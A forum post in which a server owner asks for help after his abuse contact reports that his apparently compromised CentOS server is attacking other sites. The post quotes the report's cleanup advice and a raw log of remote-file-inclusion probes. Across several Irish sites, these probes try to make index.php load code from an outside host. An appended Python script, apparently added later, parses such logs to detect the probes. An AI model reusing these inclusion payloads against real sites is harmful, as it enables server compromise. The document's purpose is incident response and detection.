Need some help quick please


I think my server has been hacked and it’s attacking other servers..

I thought my colo was off his rocker when he first complained to me yesterday.. Today he got another notification from a different source…

Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================

NOTES:

This type of attack typically means the server to which the IP address of the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox, /var/spool/squid, and /var/spool/cron. Please use "ls -lab" for checking directories as sometimes compromised servers will have hidden files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious processes; oftentimes the malware / hack pretends to be an Apache process.

Linux Malware Detect is an excellent program for finding malware on a server. You can find the latest version at http://www.rfxn.com/projects/linux-malware-detect/

Clam Anti-virus, clamscan, can also be used to find commonly used PHP and Perl-based hacks, including various php shells, on a server using the "--infected" and "--recursive" options.

You may also want to check out using rootkit detection tools – http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://www.ossec.net/en/rootcheck.html as tools which should be used in addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.

Code:

Type of attack:

Sample log report including date and time stamp (1st field is the word "request", 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker):

Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dt1Qz7pAAADzLoi8 "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dwlQz7pAAADzInIY "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dzVQz7pAAADzFmuE "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d2FQz7pAAAF1no7s "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d41Qz7pAAADzdvYM "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d7lQz7pAAADywcZ0 "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d@VQz7pAAADy9lTA "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000] "GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-eBFQz7pAAADzfwII "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGMpHwk "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:05 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmVQz7pAAABz8XSc "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAAGMpHww "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzPqGw "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAABx4Ebg "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAAByOINM "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAABx2Dqw "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMrI-c "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAAGMpHxU "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:27 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j61Qz7pAAADzKodQ "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"


TIA

Ed
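Added example, not part of the post or of the abuse report quoted in it: a small Python script that parses the report's "Request:" lines, flags query parameters whose value is itself a remote URL (the remote-file-inclusion probe the log shows against lang=, main=, go= and so on), and tallies source IP, payload URL, targeted vhosts and parameter names. That gives the server owner the facts to confirm the reported source address is theirs and a concrete payload name to hunt for in the directories the notes list. The sample input is three lines taken from the report plus one constructed benign request; the helper names are my own.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Matches the report's "Request:" lines: attacked vhost, client (attacker) IP,
# timestamp, request line, status, size. The trailing unique-id fields are ignored.
LINE_RE = re.compile(
    r'Request:\s+(?P<vhost>\S+)\s+(?P<client>\S+)\s+\S+\s+\S+\s+'
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<method>\S+)\s+(?P<target>\S+)\s+\S+"\s+'
    r'(?P<status>\d{3})\s+(?P<bytes>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Three lines taken from the report above plus one constructed benign request.
SAMPLE = """\
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
Request: example.ie 198.51.100.7 - - [23/Nov/2012:21:05:00 +0000] "GET /index.php?lang=en HTTP/1.1" 200 4120 "-" "-" UK-constructed "-"
""".splitlines()

def parse_line(line):
    """Return the fields of one report line as a dict, or None if it is not a request line."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None

def remote_includes(target):
    """List (param, url) pairs whose query value is a remote URL: the
    remote-file-inclusion probe seen in the report (lang=, main=, go=, ...)."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(REMOTE_SCHEMES)]

def summarize(lines):
    """Tally RFI attempts by source IP, payload URL, targeted vhost and parameter name."""
    s = {"attempts": 0, "sources": Counter(), "payloads": Counter(),
         "vhosts": Counter(), "params": Counter()}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, url in remote_includes(rec["target"]):
            s["attempts"] += 1
            s["sources"][rec["client"]] += 1
            s["payloads"][url.rstrip("?")] += 1   # drop the trailing "?" the probe appends
            s["vhosts"][rec["vhost"]] += 1
            s["params"][param] += 1
    return s
```

Run it over the full report (one "Request:" line per entry) and the "payloads" counter names the file to search for on the source host, while "sources" confirms which address the complaint is really about.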
